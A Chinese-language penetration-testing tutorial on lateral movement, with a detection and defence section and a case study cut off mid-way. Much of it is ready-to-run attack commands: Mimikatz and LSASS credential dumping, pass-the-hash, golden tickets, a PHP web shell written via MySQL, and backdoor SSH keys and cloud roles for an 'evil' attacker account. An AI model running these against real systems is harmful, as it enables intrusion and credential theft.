Day-208-渗透测试中的横向移动技术

# Day 231: 渗透测试中的横向移动技术

> 渗透测试系列第 21 天 | 预计阅读时间：30 分钟 | 难度：★★★★★

---

## 清单 目录
1. [横向移动概述](#横向移动概述)
2. [横向移动的前提条件](#横向移动的前提条件)
3. [凭证获取与传递](#凭证获取与传递)
4. [Windows 环境横向移动](#windows-环境横向移动)
5. [Linux 环境横向移动](#linux-环境横向移动)
6. [域环境横向移动](#域环境横向移动)
7. [云环境横向移动](#云环境横向移动)
8. [检测与防御](#检测与防御)
9. [实战案例](#实战案例)
10. [总结与思考](#总结与思考)
11. [参考资料](#参考资料)

---

## 横向移动概述

### 什么是横向移动

横向移动（Lateral Movement）是渗透测试和攻击链中的关键阶段，指攻击者在成功入侵初始系统后，利用该系统的访问权限和网络位置，进一步渗透内网中的其他系统，扩大控制范围的过程。

```
┌─────────────────────────────────────────────────────────────────┐
│                    攻击链中的横向移动                            │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  初始访问 → 权限提升 → 权限维持 → 横向移动 → 数据窃取           │
│                              ↑         ↑                        │
│                         已学内容   本阶段重点                   │
│                                                                 │
│  ┌──────────┐    ┌──────────┐    ┌──────────┐    ┌──────────┐ │
│  │ 外部网络  │ →  │ 边界主机  │ →  │ 内网主机 A │ →  │ 核心服务器│ │
│  └──────────┘    └──────────┘    └──────────┘    └──────────┘ │
│                         ↑                                        │
│                    初始入侵点                                    │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
```

### 为什么需要横向移动

在真实的渗透测试场景中，我观察到横向移动的必要性体现在以下几个方面：

1. **初始访问点价值有限**: 钓鱼邮件感染的通常是普通员工电脑，而非核心服务器
2. **数据分散存储**: 敏感数据往往分布在多台服务器上
3. **权限隔离**: 不同系统有不同的访问控制，需要逐个突破
4. **模拟真实威胁**: APT 攻击的核心特征就是内网横向渗透
5. **评估纵深防御**: 测试内网分段、访问控制等防御措施的有效性

### 横向移动的核心原则

| 原则 | 说明 | 重要性 |
|------|------|--------|
| **隐蔽性** | 避免触发 IDS/IPS、EDR 等检测系统 | ★★★★★ |
| **效率** | 快速定位高价值目标，减少盲目扫描 | ★★★★☆ |
| **凭证管理** | 安全存储和使用获取的凭证 | ★★★★★ |
| **路径规划** | 选择最优渗透路径，避免绕路 | ★★★★☆ |
| **可追溯性** | 记录所有移动路径，便于清理和报告 | ★★★★☆ |

### 横向移动的战术分类

```
横向移动技术
├── 基于远程执行
│   ├── PsExec
│   ├── WMI
│   ├── WinRM
│   └── SSH
├── 基于服务控制
│   ├── SC (Service Control)
│   ├── 远程服务部署
│   └── DCOM
├── 基于凭证传递
│   ├── Pass-the-Hash
│   ├── Pass-the-Ticket
│   └── Overpass-the-Hash
├── 基于应用协议
│   ├── RDP
│   ├── SMB
│   └── 数据库远程连接
└── 基于信任关系
    ├── 域信任
    ├── SSH 信任
    └── 应用信任
```

---

## 横向移动的前提条件

### 1. 网络连通性

#### 网络侦察

```powershell
# Windows: 扫描内网存活主机
# 使用 PowerShell 进行快速扫描
$subnet = "192.168.1"
1..254 | ForEach-Object {
    $ip = "$subnet.$_"
    if (Test-Connection -ComputerName $ip -Count 1 -Quiet) {
        Write-Host "[+] $ip is alive" -ForegroundColor Green
    }
}

# 使用 nmap (需要安装)
nmap -sn 192.168.1.0/24  # Ping 扫描
nmap -sS 192.168.1.0/24  # SYN 扫描
nmap -sV 192.168.1.0/24  # 服务版本探测
```

```bash
# Linux: 网络扫描
# Ping 扫描
for i in {1..254}; do
    ping -c 1 192.168.1.$i | grep "64 bytes" &
done

# 使用 nmap
nmap -sn 192.168.1.0/24
nmap -sS -sV -O 192.168.1.0/24  # 全面扫描
```

#### 端口扫描

```powershell
# PowerShell 端口扫描
function Test-Port {
    param($Target, $Port)
    $tcp = New-Object System.Net.Sockets.TcpClient
    try {
        $tcp.Connect($Target, $Port)
        $tcp.Close()
        return $true
    } catch {
        return $false
    }
}

# 扫描常见端口
$ports = @(22, 23, 80, 443, 445, 3389, 5985, 5986)
$ports | ForEach-Object {
    if (Test-Port -Target "192.168.1.100" -Port $_) {
        Write-Host "[+] Port $_ is open"
    }
}
```

### 2. 凭证准备

#### 凭证类型

| 凭证类型 | 描述 | 用途 |
|----------|------|------|
| **明文密码** | 用户明文密码 | RDP、SSH、Web 登录 |
| **NTLM Hash** | Windows 密码哈希 | Pass-the-Hash、WMI、PsExec |
| **Kerberos Ticket** | Kerberos 票据 | Pass-the-Ticket、域内移动 |
| **SSH Key** | SSH 私钥 | SSH 免密登录 |
| **API Key** | 云服务 API 密钥 | 云资源访问 |

#### 凭证存储位置

```
Windows:
├── LSASS 内存 (Mimikatz 提取)
├── SAM 数据库 (需要 SYSTEM 权限)
├── NTDS.dit (域控制器)
├── 浏览器保存的密码
├── 配置文件中的明文密码
└── Windows 凭据管理器

Linux:
├── /etc/shadow (需要 root)
├── ~/.ssh/id_rsa (SSH 私钥)
├── ~/.bash_history (可能包含密码)
├── 配置文件中的密码
└── 内存中的进程凭证
```

### 3. 权限要求

| 横向移动方式 | 所需最低权限 |
|--------------|--------------|
| PsExec | 本地管理员 |
| WMI | 本地管理员或远程启用权限 |
| WinRM | 远程管理权限 |
| SSH | 普通用户 (有 SSH 访问) |
| RDP | 远程桌面用户组成员 |
| Pass-the-Hash | 本地管理员 (目标系统) |

---

## 凭证获取与传递

### Windows 凭证获取

#### Mimikatz 使用指南

```powershell
# 下载 Mimikatz
# https://github.com/gentilkiwi/mimikatz/releases

# 以管理员权限运行
mimikatz.exe

# 提升权限
mimikatz # privilege::debug

# 转储所有凭证
mimikatz # sekurlsa::logonpasswords

# 提取 NTLM Hash
mimikatz # lsadump::sam
mimikatz # lsadump::secrets
mimikatz # lsadump::cache

# 提取 Kerberos 票据
mimikatz # sekurlsa::tickets

# 提取域控制器 NTDS.dit (需要域管权限)
mimikatz # lsadump::dcsync /user:krbtgt
```

#### Mimikatz 输出示例

```
Authentication Id : 0 ; 123456 (00000000:0001e240)
Session           : RemoteInteractive from 2
User Name         : admin
Domain            : CORP
Logon Server      : DC01
Logon Time        : 2026/4/12 8:00:00
SID               : S-1-5-21-123456789-987654321-111111111-500
    msv :
     [00000003] Primary
     * Username : admin
     * Domain   : CORP
     * NTLM     : a4f9b1c2d3e4f5a6b7c8d9e0f1a2b3c4
     * SHA1     : 1234567890abcdef1234567890abcdef12345678
    tspkg :
    wdigest :
     * Username : admin
     * Domain   : CORP
     * Password : (null)  # 明文密码 (如果可用)
    kerberos :
    ssp :
    credman :
```

#### 无文件凭证提取

```powershell
# 使用 PowerShell 提取 LSASS 内存 (需要管理员权限)
# 注意：这会被大多数 EDR 检测

# 方法 1: 使用 ProcDump
procdump.exe -ma lsass.exe lsass.dmp
# 然后用 Mimikatz 分析 dump 文件
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords

# 方法 2: 使用 PowerShell (Comsvcs.dll)
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id lsass.dmp full

# 方法 3: 直接读取内存 (需要特殊权限)
# 已被现代 Windows 阻止
```

### Linux 凭证获取

#### Shadow 文件提取

```bash
# 需要 root 权限
sudo cat /etc/shadow

# 提取特定用户
sudo grep "admin" /etc/shadow

# 格式：username:$id$salt$hash:lastchange:min:max:warn:inactive:expire:reserved
# $id$: 1=MD5, 2a=Blowfish, 5=SHA-256, 6=SHA-512
```

#### SSH 密钥提取

```bash
# 查找 SSH 私钥
find /home -name "id_rsa" 2>/dev/null
find /root -name "id_rsa" 2>/dev/null

# 查看 SSH 配置
cat ~/.ssh/config
cat /etc/ssh/ssh_config

# 提取已知主机
cat ~/.ssh/known_hosts
```

#### 历史命令中的凭证

```bash
# 检查 bash 历史
cat ~/.bash_history | grep -i "password\|passwd\|mysql\|ssh"

# 检查其他 shell 历史
cat ~/.zsh_history
cat ~/.sh_history

# 检查进程环境中的密码
cat /proc/*/environ 2>/dev/null | tr '\0' '\n' | grep -i "password"
```

#### 配置文件中的凭证

```bash
# 常见配置文件位置
grep -r "password\|passwd\|pwd" /etc/ 2>/dev/null
grep -r "password\|passwd\|pwd" /home/*/ 2>/dev/null
grep -r "password\|passwd\|pwd" /opt/*/ 2>/dev/null

# 数据库配置
cat /etc/mysql/my.cnf
cat /etc/postgresql/*/main/pg_hba.conf

# Web 应用配置
cat /var/www/*/wp-config.php
cat /var/www/*/config.php
```

### Pass-the-Hash (PtH)

#### 原理

Pass-the-Hash 是一种认证技术，允许攻击者使用 NTLM 哈希而非明文密码进行认证。

```
┌─────────────────────────────────────────────────────────┐
│              Pass-the-Hash 认证流程                      │
├─────────────────────────────────────────────────────────┤
│                                                         │
│  攻击者              目标系统          域控制器          │
│    │                    │                  │            │
│    │── NTLM Hash ────→ │                  │            │
│    │                    │── 挑战响应 ────→ │            │
│    │                    │←── 认证结果 ────│            │
│    │←── 访问权限 ───── │                  │            │
│                                                         │
│  关键点：不需要明文密码，只需 NTLM Hash                  │
└─────────────────────────────────────────────────────────┘
```

#### 使用 PtH 进行横向移动

```powershell
# 使用 Mimikatz 进行 PtH
mimikatz # privilege::debug
mimikatz # sekurlsa::pth /user:admin /domain:CORP /ntlm:a4f9b1c2d3e4f5a6b7c8d9e0f1a2b3c4

# 使用 PsExec with PtH (需要 psexec.py from Impacket)
python3 psexec.py admin@192.168.1.100 -hashes :a4f9b1c2d3e4f5a6b7c8d9e0f1a2b3c4

# 使用 WMI with PtH
python3 wmiexec.py admin@192.168.1.100 -hashes :a4f9b1c2d3e4f5a6b7c8d9e0f1a2b3c4

# 使用 CrackMapExec
crackmapexec smb 192.168.1.0/24 -u admin -H a4f9b1c2d3e4f5a6b7c8d9e0f1a2b3c4
```

### Pass-the-Ticket (PtT)

#### 原理

Pass-the-Ticket 使用 Kerberos 票据而非密码或哈希进行认证。

```
Kerberos 认证流程:
1. 用户 → KDC: 认证请求 (AS-REQ)
2. KDC → 用户: TGT (Ticket Granting Ticket)
3. 用户 → KDC: 服务请求 + TGT (TGS-REQ)
4. KDC → 用户: 服务票据 (TGS)
5. 用户 → 服务: 访问请求 + TGS
6. 服务 → 用户: 访问 granted

攻击者窃取 TGT 或 TGS 后，可直接用于认证，无需密码
```

#### 使用 PtT 进行横向移动

```powershell
# 使用 Mimikatz 导出票据
mimikatz # sekurlsa::tickets /export

# 注入票据
mimikatz # kerberos::ptt [0;12345]-2-0-60a10000-admin@CORP.kirbi

# 验证票据
klist

# 使用 Rubeus (现代替代工具)
Rubeus.exe dump  # 导出所有票据
Rubeus.exe ptt /ticket:base64ticket  # 注入票据
```

### Overpass-the-Hash

#### 原理

Overpass-the-Hash 使用 NTLM 哈希获取 Kerberos TGT，从而实现完全的 Kerberos 认证。

```powershell
# 使用 Mimikatz
mimikatz # sekurlsa::logonpasswords  # 获取哈希
mimikatz # kerberos::ptt /user:admin /domain:CORP /rc4:a4f9b1c2d3e4f5a6b7c8d9e0f1a2b3c4

# 使用 Rubeus
Rubeus.exe asktgt /user:admin /domain:CORP /rc4:a4f9b1c2d3e4f5a6b7c8d9e0f1a2b3c4 /ptt
```

---

## Windows 环境横向移动

### 1. PsExec

#### 工具介绍

PsExec 是 Sysinternals 套件中的远程执行工具，也是渗透测试中最常用的横向移动工具之一。

#### 使用方法

```cmd
# 使用明文密码
psexec \\192.168.1.100 -u admin -p Password123 cmd.exe

# 使用哈希 (需要 PsExec 修改版或配合 Mimikatz)
# 先用 Mimikatz 注入哈希，然后正常使用 PsExec

# 远程执行命令
psexec \\192.168.1.100 -u admin -p Password123 cmd.exe /c "whoami"

# 交互式 shell
psexec \\192.168.1.100 -u admin -p Password123 -i cmd.exe

# 复制文件并执行
psexec \\192.168.1.100 -u admin -p Password123 -c malware.exe
```

#### PowerShell 替代方案

```powershell
# 使用 Invoke-WmiMethod 模拟 PsExec
$process = Invoke-WmiMethod -Class Win32_Process -Name Create `
    -ArgumentList "cmd.exe /c whoami" `
    -ComputerName "192.168.1.100" `
    -Credential (Get-Credential)

# 使用 Enter-PSSession (需要 WinRM)
Enter-PSSession -ComputerName 192.168.1.100 -Credential (Get-Credential)
```

### 2. WMI (Windows Management Instrumentation)

#### WMI 远程执行

```powershell
# 使用 PowerShell 进行 WMI 远程执行
$cred = Get-Credential
Invoke-WmiMethod -Class Win32_Process -Name Create `
    -ArgumentList "cmd.exe /c calc.exe" `
    -ComputerName "192.168.1.100" `
    -Credential $cred

# 使用 wmic 命令
wmic /node:192.168.1.100 /user:admin /password:Password123 process call create "cmd.exe"

# 使用 Impacket wmiexec.py (支持哈希)
python3 wmiexec.py admin@192.168.1.100
python3 wmiexec.py -hashes :a4f9b1c2d3e4f5a6b7c8d9e0f1a2b3c4 admin@192.168.1.100
```

#### WMI 持久化 + 横向移动

```powershell
# 创建 WMI 事件订阅 (结合持久化)
$filterName = "RemoteExecFilter"
$consumerName = "RemoteExecConsumer"

# 创建事件过滤器
Set-WmiInstance -Namespace "root\subscription" -Class __EventFilter `
    -Arguments @{Name=$filterName; EventNameSpace="root\cimv2"; QueryLanguage="WQL"; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_Process' AND TargetInstance.Name = 'explorer.exe'"}

# 创建消费者
Set-WmiInstance -Namespace "root\subscription" -Class CommandLineEventConsumer `
    -Arguments @{Name=$consumerName; CommandLineTemplate="cmd.exe /c calc.exe"}

# 创建绑定
Set-WmiInstance -Namespace "root\subscription" -Class __FilterToConsumerBinding `
    -Arguments @{Filter=[Ref](Get-WmiObject -Namespace "root\subscription" -Class __EventFilter -Filter "Name='$filterName'"); Consumer=[Ref](Get-WmiObject -Namespace "root\subscription" -Class CommandLineEventConsumer -Filter "Name='$consumerName'")}
```

### 3. WinRM (Windows Remote Management)

#### 启用 WinRM

```powershell
# 在目标系统上启用 WinRM (需要管理员权限)
winrm quickconfig
winrm set winrm/config/service @{AllowUnencrypted="true"}
winrm set winrm/config/service/auth @{Basic="true"}

# 或使用 PowerShell
Enable-PSRemoting -Force
Set-Item WSMan:\localhost\Service\AllowUnencrypted -Value $true
Set-Item WSMan:\localhost\Service\Auth\Basic -Value $true
```

#### 使用 WinRM 横向移动

```powershell
# 建立远程会话
$session = New-PSSession -ComputerName 192.168.1.100 -Credential (Get-Credential)
Enter-PSSession -Session $session

# 远程执行命令
Invoke-Command -ComputerName 192.168.1.100 -ScriptBlock { whoami } -Credential (Get-Credential)

# 批量执行
$computers = @("192.168.1.100", "192.168.1.101", "192.168.1.102")
Invoke-Command -ComputerName $computers -ScriptBlock { hostname; whoami } -Credential (Get-Credential)

# 使用 Impacket winrmexec.py
python3 winrmexec.py admin:Password123@192.168.1.100 "whoami"
```

### 4. RDP (Remote Desktop Protocol)

#### RDP 横向移动

```cmd
# 使用 mstsc
mstsc /v:192.168.1.100 /u:admin /p:Password123

# 使用 xfreerdp (Linux)
xfreerdp /v:192.168.1.100 /u:admin /p:Password123

# 使用哈希 (需要 RDP 工具支持)
xfreerdp /v:192.168.1.100 /u:admin /pth:a4f9b1c2d3e4f5a6b7c8d9e0f1a2b3c4
```

#### 启用 RDP

```powershell
# 远程启用 RDP (需要已有访问权限)
Invoke-WmiMethod -Path "Win32_TerminalServiceSetting" `
    -Name SetAllowTSConnections `
    -ArgumentList 1, 0 `
    -ComputerName "192.168.1.100" `
    -Credential (Get-Credential)

# 防火墙规则
Invoke-WmiMethod -Namespace "root\standardcimv2\embedded" `
    -Class MSFT_NetFirewallRule `
    -Name EnableNetFirewallRule `
    -ArgumentList @{DisplayName="Remote Desktop"} `
    -ComputerName "192.168.1.100"
```

### 5. SMB 文件共享

#### SMB 横向移动

```powershell
# 映射网络驱动器
net use Z: \\192.168.1.100\share Password123 /user:admin

# PowerShell
New-PSDrive -Name "Z" -PSProvider FileSystem -Root "\\192.168.1.100\share" -Credential (Get-Credential)

# 复制文件
copy C:\temp\tool.exe \\192.168.1.100\share\

# 使用 Impacket smbclient.py
python3 smbclient.py admin:Password123@192.168.1.100
```

#### SMB 执行

```powershell
# 使用 PsExec 通过 SMB 执行
psexec \\192.168.1.100 -u admin -p Password123 cmd.exe

# 使用 Impacket psexec.py
python3 psexec.py admin@192.168.1.100
python3 psexec.py -hashes :a4f9b1c2d3e4f5a6b7c8d9e0f1a2b3c4 admin@192.168.1.100

# 使用 Impacket smbexec.py (更隐蔽)
python3 smbexec.py admin@192.168.1.100
```

### 6. DCOM (Distributed Component Object Model)

#### DCOM 横向移动

```powershell
# 使用 PowerShell 进行 DCOM 执行
$com = [Type]::GetTypeFromProgID("MMC20.Application", "192.168.1.100")
$obj = [System.Activator]::CreateInstance($com)
$obj.Document.ActiveView.ExecuteShellCommand("cmd.exe", $null, "/c calc.exe", "7")

# 常见 DCOM 对象
# - MMC20.Application
# - ShellWindows.1
# - ShellBrowserWindow.1
# - Excel.Application
# - Word.Application
```

---

## Linux 环境横向移动

### 1. SSH

#### SSH 横向移动

```bash
# 使用密码
ssh admin@192.168.1.100
sshpass -p 'Password123' ssh admin@192.168.1.100

# 使用密钥
ssh -i ~/.ssh/id_rsa admin@192.168.1.100

# 端口转发
ssh -L 8080:internal-server:80 admin@192.168.1.100

# SOCKS 代理
ssh -D 1080 admin@192.168.1.100
# 然后配置浏览器使用 SOCKS5 代理 127.0.0.1:1080
```

#### SSH 密钥部署

```bash
# 复制公钥到目标系统
ssh-copy-id admin@192.168.1.100

# 手动添加
echo "ssh-rsa AAAA... attacker@evil" >> ~/.ssh/authorized_keys

# 批量部署
for host in 192.168.1.{100..110}; do
    ssh-copy-id admin@$host
done
```

### 2. 远程命令执行

#### 基于已有凭证的远程执行

```bash
# SSH 批量执行
for host in 192.168.1.{100..110}; do
    ssh admin@$host "whoami; hostname"
done

# 使用 pssh (Parallel SSH)
pssh -h hosts.txt -l admin -i "whoami"

# 使用 Ansible
ansible all -i hosts.txt -m shell -a "whoami" -u admin
```

### 3. NFS 共享

#### NFS 横向移动

```bash
# 挂载 NFS 共享
showmount -e 192.168.1.100
mount -t nfs 192.168.1.100:/share /mnt

# 如果配置不当，可能无需认证直接访问
# 检查 /etc/exports 配置
cat /etc/exports
```

### 4. 数据库远程连接

#### MySQL/MariaDB

```bash
# 远程连接
mysql -h 192.168.1.100 -u root -p

# 如果存在弱密码或空密码
mysql -h 192.168.1.100 -u root

# 上传 Web Shell (需要 FILE 权限)
mysql -h 192.168.1.100 -u root -p -e "SELECT '<?php eval(\$_POST[c]);?>' INTO OUTFILE '/var/www/shell.php'"
```

#### PostgreSQL

```bash
# 远程连接
psql -h 192.168.1.100 -U postgres

# 执行系统命令 (需要 superuser)
psql -h 192.168.1.100 -U postgres -c "COPY cmd_exec FROM PROGRAM 'id';"
```

---

## 域环境横向移动

### 1. 域信息收集

#### 使用 PowerView

```powershell
# 下载 PowerView
# https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
Import-Module .\PowerView.ps1

# 获取域信息
Get-NetDomain
Get-NetDomainController
Get-NetForest

# 获取用户
Get-NetUser
Get-NetUser -AdminCount  # 获取管理员

# 获取计算机
Get-NetComputer
Get-NetComputer -OperatingSystem "*Server*"  # 只获取服务器

# 获取组
Get-NetGroup
Get-NetGroupMember -GroupName "Domain Admins"

# 获取会话
Get-NetSession -ComputerName "DC01"

# 获取进程
Get-NetProcess -ComputerName "192.168.1.100"

# 文件共享
Find-InterestingFile -ComputerName "192.168.1.100"
```

#### 使用 BloodHound

```powershell
# 下载 Sharphound 收集器
# https://github.com/BloodHoundAD/Sharphound

# 运行收集器
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\temp

# 或使用可执行文件
SharpHound.exe -c All

# 将收集的 JSON 导入 BloodHound GUI 进行分析
```

### 2. 域管理员权限获取

#### DCSync 攻击

```powershell
# 使用 Mimikatz 进行 DCSync (需要域管或复制权限)
mimikatz # lsadump::dcsync /user:krbtgt
mimikatz # lsadump::dcsync /user:admin

# 使用 Impacket secretsdump.py
python3 secretsdump.py CORP/admin:Password123@192.168.1.10
# 或
python3 secretsdump.py -hashes :a4f9b1c2d3e4f5a6b7c8d9e0f1a2b3c4 CORP/admin@192.168.1.10
```

#### Golden Ticket (金票攻击)

```powershell
# 使用 Mimikatz 创建金票
mimikatz # kerberos::golden /user:admin /domain:CORP /sid:S-1-5-21-... /krbtgt:hash /id:500 /ptt

# 参数说明:
# /user: 用户名
# /domain: 域名
# /sid: 域 SID
# /krbtgt: krbtgt 账户的 NTLM 哈希
# /id: RID (500=Administrator)
# /ptt: 直接注入票据

# 使用 Tiara (Python)
python3 tiara.py golden -d CORP -s S-1-5-21-... -k a4f9b1c2d3e4f5a6b7c8d9e0f1a2b3c4 -u admin
```

#### Silver Ticket (银票攻击)

```powershell
# 使用 Mimikatz 创建银票
mimikatz # kerberos::golden /domain:CORP /sid:S-1-5-21-... /target:DC01 /service:host /rc4:hash /user:admin /ptt

# 银票 vs 金票:
# - 银票只能访问特定服务，金票可以访问所有服务
# - 银票不需要与 DC 通信，更隐蔽
# - 银票需要目标服务的哈希
```

### 3. 域内横向移动

#### 使用 CrackMapExec

```bash
# 扫描域内主机
crackmapexec smb 192.168.1.0/24

# 凭证喷洒
crackmapexec smb 192.168.1.0/24 -u admin -p 'Password123'

# 哈希传递
crackmapexec smb 192.168.1.0/24 -u admin -H a4f9b1c2d3e4f5a6b7c8d9e0f1a2b3c4

# 枚举会话
crackmapexec smb 192.168.1.0/24 -u admin -p Password123 -l users.txt --sessions

# 枚举文件共享
crackmapexec smb 192.168.1.0/24 -u admin -p Password123 --shares

# 执行命令
crackmapexec smb 192.168.1.100 -u admin -p Password123 -x "whoami"
```

---

## 云环境横向移动

### AWS 环境

#### IAM 权限提升

```bash
# 使用 AWS CLI
aws sts get-caller-identity  # 查看当前身份

# 枚举 IAM 权限
aws iam list-attached-user-policies --user-name admin
aws iam list-user-policies --user-name admin

# 如果存在过度权限，可能进行权限提升
aws iam attach-user-policy --user-name attacker --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
```

#### 实例元数据服务

```bash
# 获取 IAM 角色凭证 (AWS IMDSv1)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# 获取具体凭证
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name

# IMDSv2 (需要 token)
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/
```

### Azure 环境

#### Azure AD 横向移动

```powershell
# 使用 Azure PowerShell
Connect-AzAccount
Get-AzContext
Get-AzSubscription

# 枚举资源
Get-AzResource
Get-AzVM

# 如果存在过度权限
New-AzRoleAssignment -SignInName attacker@evil.com -RoleDefinitionName "Contributor"
```

### GCP 环境

#### GCP 服务账户滥用

```bash
# 获取服务账户信息
gcloud auth list
gcloud config list

# 枚举项目
gcloud projects list

# 如果存在过度权限
gcloud projects add-iam-policy-binding PROJECT_ID \
    --member="user:attacker@evil.com" \
    --role="roles/editor"
```

---

## 检测与防御

### 横向移动检测指标

| 检测点 | 指标 | 阈值建议 |
|--------|------|----------|
| **认证日志** | 同一账户多地登录 | 5 分钟内>3 个不同 IP |
| **进程创建** | 远程进程创建事件 | 任何 PsExec/WMI 远程执行 |
| **网络连接** | SMB 连接激增 | 单主机>50 个 SMB 连接/分钟 |
| **PowerShell** | 远程 PowerShell 会话 | 任何 Invoke-Command 远程执行 |
| **Kerberos** | 异常票据请求 | 非工作时间 TGT 请求 |

### Windows 检测配置

#### 启用详细日志

```powershell
# 启用 PowerShell 日志
# 组策略 → 计算机配置 → 管理模板 → Windows 组件 → Windows PowerShell
# 启用"打开 PowerShell 模块日志记录"
# 启用"打开 PowerShell 脚本块日志记录"

# 注册表配置
New-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" `
    -Name "EnableScriptBlockLogging" -Value 1 -PropertyType DWORD -Force

# 启用进程创建日志
# 组策略 → 计算机配置 → Windows 设置 → 安全设置 → 高级审核策略 → 详细跟踪
# 启用"审核进程创建"
```

#### 检测脚本

```powershell
# 检测 PsExec 使用
Get-WinEvent -FilterHashtable @{LogName='System'; Id=7045} | 
    Where-Object {$_.Message -like "*psexec*" -or $_.Message -like "*PsExec*"}

# 检测 WMI 远程执行
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-WMI-Activity/Operational'; Id=5857,5858}

# 检测异常 RDP 登录
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4624} | 
    Where-Object {$_.Message -like "*LogonType: 10*"}  # 远程桌面登录

# 检测 Pass-the-Hash
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4624} | 
    Where-Object {$_.Message -like "*LogonProcessName:*Advapi*" -and $_.Message -like "*LogonType: 3*"}
```

### Linux 检测配置

#### 审计配置

```bash
# 配置 auditd
sudo vim /etc/audit/rules.d/lateral_movement.rules

# 监控 SSH 登录
-w /var/log/auth.log -p wa -k ssh_login
-w /var/log/secure -p wa -k ssh_login

# 监控 sudo 使用
-w /var/log/sudo.log -p wa -k sudo_use

# 监控异常进程
-a exit,always -F arch=b64 -S execve -k process_exec

# 查看日志
ausearch -k ssh_login
ausearch -k process_exec
```

#### 检测脚本

```bash
#!/bin/bash
# 检测异常 SSH 登录
echo "=== 最近的 SSH 登录 ==="
grep "Accepted" /var/log/auth.log | tail -20

echo "=== 失败的 SSH 登录 ==="
grep "Failed" /var/log/auth.log | tail -20

echo "=== 多地点登录 ==="
grep "Accepted" /var/log/auth.log | awk '{print $NF}' | sort | uniq -c | sort -rn

echo "=== 异常时间登录 (23:00-06:00) ==="
grep "Accepted" /var/log/auth.log | awk '$3 ~ /^23:|^00:|^01:|^02:|^03:|^04:|^05:|^06:/'
```

### 网络检测

#### 流量分析

```
检测工具:
├── Zeek (原 Bro) - 网络流量分析
├── Suricata - IDS/IPS
├── Wireshark - 流量分析
└── Network Miner - 网络取证

关键指标:
├── SMB 流量异常增加
├── WMI/RPC 流量异常
├── Kerberos 票据请求异常
├── PowerShell 远程会话
└── 异常端口使用
```

### 防御最佳实践

#### 1. 网络分段

```
推荐架构:
┌─────────────┐    ┌─────────────┐    ┌─────────────┐
│   外部网络   │ →  │   DMZ 区域   │ →  │   内网区域   │
│             │    │             │    │             │
│  互联网访问  │    │  边界服务器  │    │  核心服务器  │
└─────────────┘    └─────────────┘    └─────────────┘
                          ↑                  ↑
                    严格防火墙规则      更严格访问控制

每个区域之间:
- 防火墙隔离
- 最小化开放端口
- 强制认证
- 流量监控
```

#### 2. 最小权限原则

```powershell
# 定期审查本地管理员
Get-LocalGroupMember -Group "Administrators"

# 定期审查域管理员
Get-ADGroupMember -Identity "Domain Admins"

# 移除不必要的管理员权限
Remove-LocalGroupMember -Group "Administrators" -Member "username"

# 使用 LAPS (Local Administrator Password Solution)
# 为每台计算机设置唯一的本地管理员密码
```

#### 3. 禁用不必要的协议

```powershell
# 禁用 WinRM (如果不需要)
Disable-PSRemoting -Force
Stop-Service WinRM
Set-Service WinRM -StartupType Disabled

# 禁用 WMI 远程 (如果不需要)
# 组策略 → 计算机配置 → 管理模板 → Windows 组件 → Windows 远程管理
# 禁用"允许远程服务器管理"

# 限制 RDP
# 组策略 → 计算机配置 → 管理模板 → Windows 组件 → 远程桌面服务
# 配置"允许用户通过远程桌面服务进行远程连接"
```

#### 4. 多因素认证

```
强制 MFA 的场景:
├── 远程桌面登录
├── VPN 连接
├── 云平台控制台
├── 特权账户操作
└── 敏感系统访问

推荐方案:
├── Microsoft Authenticator
├── Google Authenticator
├── Duo Security
├── RSA SecurID
└── 硬件令牌 (YubiKey)
```

#### 5. 监控与响应

```
SIEM 配置:
├── 收集所有安全日志
├── 配置横向移动检测规则
├── 设置实时告警
└── 建立响应流程

关键告警:
├── 同一账户多地登录
├── 管理员账户异常活动
├── 大量认证失败
├── 非常规时间登录
└── 敏感系统访问
```

---

## 实战案例

### 案例一：企业内网渗透测试

#### 场景描述

在某大型制造企业的红队演练中，我通过钓鱼邮件获得了财务部门一台工作站的访问权限，目标是评估内网横向移动的可能性和检测能力。

#### 渗透路径

```
Step 1: 初始访问
┌─────────────────────────────────────────────────────────┐
│ 目标：财务工作站 (192.168.10.50)                        │
│ 方法：钓鱼邮件 + 恶意宏文档                              │
│ 结果：获得用户级权限                                    │
└─────────────────────────────────────────────────────────┘
                    ↓
Step 2: 权限提升
┌─────────────────────────────────────────────────────────┐
│ 目标：本地管理员权限                                     │
│ 方法：利用本地提权漏洞 (CVE-2021-41379)                 │
│ 结果：获得 SYSTEM 权限，提取凭证                         │
└─────────────────────────────────────────────────────────┘
                    ↓
Step 3: 凭证获取
┌─────────────────────────────────────────────────────────┐
│ 工具：Mimikatz                                          │
│ 获取：                                                   │
│ - 本地管理员 NTLM Hash                                  │
│ - 域用户 Kerberos 票据                                   │
│ - 保存的浏览器密码                                       │
└─────────────────────────────────────────────────────────┘
                    ↓
Step 4: 信息收集
┌─────────────────────────────────────────────────────────┐
│ 工具：PowerView, BloodHound                             │
│ 发现：                                                   │
│ - 域内有 3 台域控制器                                     │
│ - 50 台服务器，200 台工作站                                │
│ - 财务用户是"财务系统访问组"成员                         │
│ - 该组可访问财务服务器 (192.168.20.10)                  │
└─────────────────────────────────────────────────────────┘
                    ↓
Step 5: 横向移动 - 第一跳
┌─────────────────────────────────────────────────────────┐
│ 目标：财务服务器 (192.168.20.10)                        │
│ 方法：使用窃取的用户凭证进行 SMB 连接                     │
│ 工具：CrackMapExec                                      │
│ 命令：crackmapexec smb 192.168.20.10 -u finance_user    │
│                  -p 'Password123!' --shares             │
